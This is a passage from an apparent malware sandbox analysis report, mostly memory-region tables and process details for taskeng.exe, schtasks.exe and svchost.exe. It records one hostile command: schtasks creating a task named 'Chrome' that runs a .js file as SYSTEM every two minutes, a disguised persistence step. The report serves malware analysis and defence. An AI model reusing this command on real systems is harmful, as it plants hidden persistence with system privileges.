| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7feff0e0000 | 0x7feff1bafff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff1c0000 | 0x7feff1defff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7feff640000 | 0x7feff6b0fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7feff9a0000 | 0x7feffa38fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7feffa40000 | 0x7feffc42fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7feffc50000 | 0x7feffd7cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7feffd80000 | 0x7feffe56fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd9000 | 0x7fffffd9000 | 0x7fffffd9fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdc000 | 0x7fffffdc000 | 0x7fffffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
COM (8)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | TaskScheduler | ITaskService | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Execute | TaskScheduler | ITaskService | method_name = Connect, password = 192 |
|
1 | |
| Execute | TaskScheduler | ITaskService | method_name = GetFolder, new_interface = ITaskFolder |
|
1 | |
| Execute | TaskScheduler | ITaskService | method_name = NewTask, new_interface = ITaskDefinition |
|
1 | |
| Execute | TaskScheduler | ITaskDefinition | method_name = get_Actions, new_interface = IActionCollection |
|
1 | |
| Execute | TaskScheduler | ITaskDefinition | method_name = get_Triggers, new_interface = ITriggerCollection |
|
1 | |
| Execute | TaskScheduler | ITriggerCollection | method_name = Create, type = TASK_TRIGGER_TIME, new_interface = IDailyTrigger |
|
1 | |
| Execute | TaskScheduler | IDailyTrigger | method_name = put_StartBoundary, start_boundary = 2019-01-08T12:40:00 |
|
1 |
File (5)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 68 |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | VERSION.dll | base_address = 0x7fefcd50000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x7feff0e0000 |
|
1 | |
| Get Handle | c:\windows\system32\schtasks.exe | base_address = 0xffc70000 |
|
1 | |
| Get Filename | - | process_name = c:\windows\system32\schtasks.exe, file_name_orig = C:\Windows\system32\schtasks.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\system32\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x7fefcd515fc |
|
1 | |
| Get Address | c:\windows\system32\version.dll | function = GetFileVersionInfoW, address_out = 0x7fefcd51614 |
|
1 | |
| Get Address | c:\windows\system32\version.dll | function = VerQueryValueW, address_out = 0x7fefcd515e0 |
|
1 |
System (4)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-01-08 12:40:32 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 118560 |
|
1 | |
| Get Time | type = Local Time, time = 2019-01-08 12:40:33 (Local Time) |
|
2 |
Process #4: taskeng.exe
0
0
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\windows\system32\taskeng.exe |
| Command Line | taskeng.exe {370CACBF-C376-4665-AF86-96A1EEBE08EE} S-1-5-21-2345716840-1148442690-1481144037-1000:YKYD69Q\aETAdzjz:Interactive:Highest[1] |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:56, Reason: Created Scheduled Job |
| Unmonitor | End Time: 00:04:44, Reason: Terminated by Timeout |
| Monitor Duration | 00:03:48 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x5a0 |
| Parent PID | 0x36c (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
9F4
0x
570
0x
5E0
0x
5DC
0x
5B0
0x
5AC
0x
5A4
0x
564
0x
940
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00026fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x000d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x0037ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000380000 | 0x00380000 | 0x0047ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004c0000 | 0x004c0000 | 0x0053ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000540000 | 0x00540000 | 0x0054ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000550000 | 0x00550000 | 0x006d7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000006e0000 | 0x006e0000 | 0x00860fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000870000 | 0x00870000 | 0x01c6ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001c70000 | 0x01c70000 | 0x02062fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002080000 | 0x02080000 | 0x020fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002100000 | 0x02100000 | 0x021fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002210000 | 0x02210000 | 0x0228ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002300000 | 0x02300000 | 0x0237ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x02380000 | 0x0264efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002680000 | 0x02680000 | 0x026fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002760000 | 0x02760000 | 0x027dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002870000 | 0x02870000 | 0x0294efff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002980000 | 0x02980000 | 0x029fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002b00000 | 0x02b00000 | 0x02b7ffff | Private Memory | rw |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| taskeng.exe | 0xff2b0000 | 0xff323fff | Memory Mapped File | rwx |
|
|
|
- |
| tschannel.dll | 0x7fef8120000 | 0x7fef8128fff | Memory Mapped File | rwx |
|
|
|
- |
| ktmw32.dll | 0x7fef9440000 | 0x7fef9449fff | Memory Mapped File | rwx |
|
|
|
- |
| xmllite.dll | 0x7fefc040000 | 0x7fefc074fff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x7fefc080000 | 0x7fefc097fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7fefc4b0000 | 0x7fefc505fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7fefd180000 | 0x7fefd1c6fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7fefd480000 | 0x7fefd496fff | Memory Mapped File | rwx |
|
|
|
- |
| wevtapi.dll | 0x7fefd6b0000 | 0x7fefd71cfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7fefda50000 | 0x7fefda74fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7fefda80000 | 0x7fefda8efff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x7fefdb70000 | 0x7fefdb83fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7feff0e0000 | 0x7feff1bafff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff1c0000 | 0x7feff1defff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7feff640000 | 0x7feff6b0fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7feff9a0000 | 0x7feffa38fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7feffa40000 | 0x7feffc42fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7feffc50000 | 0x7feffd7cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7feffd80000 | 0x7feffe56fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000007fffffae000 | 0x7fffffae000 | 0x7fffffaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd3000 | 0x7fffffd3000 | 0x7fffffd4fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd5000 | 0x7fffffd5000 | 0x7fffffd6fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd7000 | 0x7fffffd7000 | 0x7fffffd8fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd9000 | 0x7fffffd9000 | 0x7fffffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdb000 | 0x7fffffdb000 | 0x7fffffdcfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdd000 | 0x7fffffdd000 | 0x7fffffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Process #5: schtasks.exe
26
0
| Information | Value |
|---|---|
| ID | #5 |
| File Name | c:\windows\system32\schtasks.exe |
| Command Line | schtasks /create /sc MINUTE /tn "Chrome" /tr "C:\Windows\Tasks\Chrome.js" /mo 2 /RU SYSTEM |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:56, Reason: Child Process |
| Unmonitor | End Time: 00:00:57, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa58 |
| Parent PID | 0xa34 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A5C
0x
A60
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c6fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x0014ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00151fff | Pagefile Backed Memory | rw |
|
|
|
- |
| schtasks.exe.mui | 0x00160000 | 0x00171fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x00180fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001a0000 | 0x001a0000 | 0x0029ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x0039ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003a0000 | 0x003a0000 | 0x00527fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000530000 | 0x00530000 | 0x006b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000006c0000 | 0x006c0000 | 0x01abffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001ac0000 | 0x01ac0000 | 0x01ac0fff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x01ad0000 | 0x01d9efff | Memory Mapped File | r |
|
|
|
- |
| rpcss.dll | 0x01da0000 | 0x01e1cfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001da0000 | 0x01da0000 | 0x01e1ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001e20000 | 0x01e20000 | 0x01efefff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001f00000 | 0x01f00000 | 0x01f00fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001f10000 | 0x01f10000 | 0x01f10fff | Pagefile Backed Memory | r |
|
|
|
- |
| kernelbase.dll.mui | 0x01f20000 | 0x01fdffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000002020000 | 0x02020000 | 0x0209ffff | Private Memory | rw |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| schtasks.exe | 0xffc30000 | 0xffc77fff | Memory Mapped File | rwx |
|
|
|
- |
| ktmw32.dll | 0x7fef9440000 | 0x7fef9449fff | Memory Mapped File | rwx |
|
|
|
- |
| taskschd.dll | 0x7fefb8f0000 | 0x7fefba16fff | Memory Mapped File | rwx |
|
|
|
- |
| xmllite.dll | 0x7fefc040000 | 0x7fefc074fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7fefc4b0000 | 0x7fefc505fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x7fefcd50000 | 0x7fefcd5bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7fefda50000 | 0x7fefda74fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7fefda80000 | 0x7fefda8efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7feff0e0000 | 0x7feff1bafff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff1c0000 | 0x7feff1defff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7feff640000 | 0x7feff6b0fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7feff9a0000 | 0x7feffa38fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7feffa40000 | 0x7feffc42fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7feffc50000 | 0x7feffd7cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7feffd80000 | 0x7feffe56fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffda000 | 0x7fffffda000 | 0x7fffffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdc000 | 0x7fffffdc000 | 0x7fffffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
COM (8)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | TaskScheduler | ITaskService | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Execute | TaskScheduler | ITaskService | method_name = Connect, password = 192 |
|
1 | |
| Execute | TaskScheduler | ITaskService | method_name = GetFolder, new_interface = ITaskFolder |
|
1 | |
| Execute | TaskScheduler | ITaskService | method_name = NewTask, new_interface = ITaskDefinition |
|
1 | |
| Execute | TaskScheduler | ITaskDefinition | method_name = get_Actions, new_interface = IActionCollection |
|
1 | |
| Execute | TaskScheduler | ITaskDefinition | method_name = get_Triggers, new_interface = ITriggerCollection |
|
1 | |
| Execute | TaskScheduler | ITriggerCollection | method_name = Create, type = TASK_TRIGGER_TIME, new_interface = IDailyTrigger |
|
1 | |
| Execute | TaskScheduler | IDailyTrigger | method_name = put_StartBoundary, start_boundary = 2019-01-08T12:40:00 |
|
1 |
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
2 | |
| Open | STD_ERROR_HANDLE | - |
|
6 | |
| Write | STD_ERROR_HANDLE | size = 7 |
|
1 | |
| Write | STD_ERROR_HANDLE | size = 19 |
|
1 |
Module (9)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | VERSION.dll | base_address = 0x7fefcd50000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x7feff0e0000 |
|
1 | |
| Load | API-MS-Win-Security-SDDL-L1-1-0.dll | base_address = 0x7feff1c0000 |
|
1 | |
| Get Handle | c:\windows\system32\schtasks.exe | base_address = 0xffc30000 |
|
1 | |
| Get Filename | - | process_name = c:\windows\system32\schtasks.exe, file_name_orig = C:\Windows\system32\schtasks.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\system32\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x7fefcd515fc |
|
1 | |
| Get Address | c:\windows\system32\version.dll | function = GetFileVersionInfoW, address_out = 0x7fefcd51614 |
|
1 | |
| Get Address | c:\windows\system32\version.dll | function = VerQueryValueW, address_out = 0x7fefcd515e0 |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-01-08 12:40:33 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 119247 |
|
1 | |
| Get Time | type = Local Time, time = 2019-01-08 12:40:33 (Local Time) |
|
3 |
Process #6: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #6 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe -k netsvcs |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:16, Reason: RPC Server |
| Unmonitor | End Time: 00:04:44, Reason: Terminated by Timeout |
| Monitor Duration | 00:03:28 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x36c |
| Parent PID | 0x1d4 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
AA0
0x
A88
0x
A84
0x
A80
0x
A74
0x
8B0
0x
214
0x
298
0x
150
0x
460
0x
7FC
0x
7F4
0x
7F0
0x
7E4
0x
79C
0x
790
0x
774
0x
75C
0x
750
0x
74C
0x
71C
0x
718
0x
70C
0x
6EC
0x
4C0
0x
498
0x
494
0x
484
0x
480
0x
474
0x
1CC
0x
120
0x
3FC
0x
3F0
0x
3E4
0x
398
0x
394
0x
390
0x
384
0x
378
0x
370
0x
B00
0x
B6C
0x
B7C
0x
B80
0x
B84
0x
B88
0x
B8C
0x
B90
0x
B94
0x
B9C
0x
BA0
0x
BE4
0x
BE8
0x
BF0
0x
894
0x
88C
0x
888
0x
6E4
0x
828
0x
858
0x
A4C
0x
A58
0x
AA8
0x
ACC
0x
AE4
0x
35C
0x
B88
0x
52C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00026fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x000d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000100000 | 0x00100000 | 0x00100fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000110000 | 0x00110000 | 0x00110fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000120000 | 0x00120000 | 0x00120fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00131fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.2.db | 0x00140000 | 0x00143fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x0015ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00161fff | Pagefile Backed Memory | r |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x00170000 | 0x0019ffff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x001a0000 | 0x001a3fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000001c0000 | 0x001c0000 | 0x001c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0024ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x0034ffff | Private Memory | rw |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x00350000 | 0x003b5fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x004bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004c0000 | 0x004c0000 | 0x00647fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000650000 | 0x00650000 | 0x007d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007e0000 | 0x007e0000 | 0x0089ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000008a0000 | 0x008a0000 | 0x00c92fff | Pagefile Backed Memory | r |
|
|
|
- |
| firewallapi.dll.mui | 0x00ca0000 | 0x00cbbfff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000cc0000 | 0x00cc0000 | 0x00d3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d40000 | 0x00d40000 | 0x00dbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000dc0000 | 0x00dc0000 | 0x00dc0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000df0000 | 0x00df0000 | 0x00dfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e40000 | 0x00e40000 | 0x00ebffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ed0000 | 0x00ed0000 | 0x00f4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f50000 | 0x00f50000 | 0x00fcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001010000 | 0x01010000 | 0x0101ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001060000 | 0x01060000 | 0x010dffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x010e0000 | 0x013aefff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000013d0000 | 0x013d0000 | 0x0144ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001450000 | 0x01450000 | 0x014cffff | Private Memory | rw |
|
|
|
- |
